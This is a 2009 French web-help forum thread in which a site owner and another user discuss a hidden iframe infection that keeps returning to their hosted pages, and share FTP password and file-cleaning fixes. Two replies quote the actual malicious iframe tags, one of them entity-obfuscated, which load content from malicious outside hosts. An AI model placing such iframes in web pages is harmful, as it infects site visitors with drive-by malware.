Virus Iframe dans page web

Résolu/Fermé
lotus974 Messages postés 53 Date d'inscription samedi 10 mai 2008 Statut Membre Dernière intervention 20 août 2010 - 19 juin 2009 à 12:34
lotus974 Messages postés 53 Date d'inscription samedi 10 mai 2008 Statut Membre Dernière intervention 20 août 2010 - 21 juin 2009 à 19:44
Bonjour,

Voilà deux jours, qu'un virus sous forme d'iframe cachée se réintroduit encore et encore sur des pages de mes sites internets tous hébergés chez 1&1. J'ai fais les manipulations que conseille certaine personne ayant eu le même problème, à savoir, suppression des fichiers infectés / changement de mot de passe FTP. Lorsque la manipulation est faîte les sites s'affichent correctement sans l'iframe cachée mais le lendemain l'iframe revient.

Auriez-vous une solution ou des conseils à me donner? Merci d'avance.
Bien cordialement.
Ludovic
A voir également:

6 réponses

lotus974 Messages postés 53 Date d'inscription samedi 10 mai 2008 Statut Membre Dernière intervention 20 août 2010 2
21 juin 2009 à 19:44
Bonjour,

J'ai réglé le problème. Une astuce pour ceux qui rencontrent le même problème.
Nettoyer vos fichiers contaminés en local et uploader les à nouveau. Ensuite changer les mots de passe de vos ftp et choisissez type d'authentification par mot de passe (pour filezilla du moins il doit y avoir l'équivalent sur cutftp ou autre client ftp) et entrer le passe à la main à chaque fois. Le virus hack votre ftp pour récupérer vos passes et effectue la contamination en boucle chaque jour, en générale le matin à l'heure du café et des croissants.

Voilà en espérant que ça puisse être utile à quelqu'un.

Bien cordialment.
2
EvazX Messages postés 43 Date d'inscription vendredi 28 mars 2008 Statut Membre Dernière intervention 25 novembre 2009
19 juin 2009 à 13:15
Ah tien sa me rappel un mauvais souvenirs sa par hazard ton code malveillant ne serais un pas un truc du genre jl.chura.pl/rc ??? entre des balise iframe et écrit avec de l'ANSII ?
0
lotus974 Messages postés 53 Date d'inscription samedi 10 mai 2008 Statut Membre Dernière intervention 20 août 2010 2
19 juin 2009 à 13:21
salut EvazX,

non, le code malveillant est de la forme :
<iframe src="http://filmproductionlifemedia.cn:8080/ts/in.cgi?pepsi71" width=125 height=125 style="visibility: hidden"></iframe>

Peut tu me parler de ton expérience avec ce "jl.chura.pl/rc" ? Merci
0
EvazX Messages postés 43 Date d'inscription vendredi 28 mars 2008 Statut Membre Dernière intervention 25 novembre 2009
19 juin 2009 à 13:28
<strong><iframe src="http://jL.chu& #114 ;a.pl/rc/" style="display:none"></iframe></strong> tien voila le code que j'avais et que j'ai aussi par moment... et ta sa pour plus d'info http://www.tommyknocker.ovh.org/spip.php?article41 , Par contre à cause de ce virus j'ai pris l'habitude d'éditer les code au lieu de directement les lancé avec mozila , et le truc qui est chiant c'est qui me vérolé tout mes executable...
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
lotus974 Messages postés 53 Date d'inscription samedi 10 mai 2008 Statut Membre Dernière intervention 20 août 2010 2
19 juin 2009 à 13:40
ok, merci beaucoup pour les infos, lorsque que je navigue sur certain de mes sites avira m'affirme que ma page contient le virus : HEUR/HTML.malware.

C'est vraiment très embêtant.

Une idée ?
0
EvazX Messages postés 43 Date d'inscription vendredi 28 mars 2008 Statut Membre Dernière intervention 25 novembre 2009
19 juin 2009 à 13:46
J'ai la même chose avec Antivir, il faut que tu réédite ta page web avant que d'autre personne sois vérolé, par contre c'est possible que plusieurs page sois atteint par le code... sinon tu fout tes page en local tu selectionne toute t'es page html, php, htm et tu les réédite avec notepad++ sinon j'ai réssament trouvé un logiciel qui permet de rechercher toute les page "web" se trouvant sur ton pc et permet de remplacer le code malveillant par ce que tu veux perso j'ai fait en sorte qui y est du vide et je pense que tu aurais la même chose que moi le logiciel si je me souvient c'est Useful File Utilities
0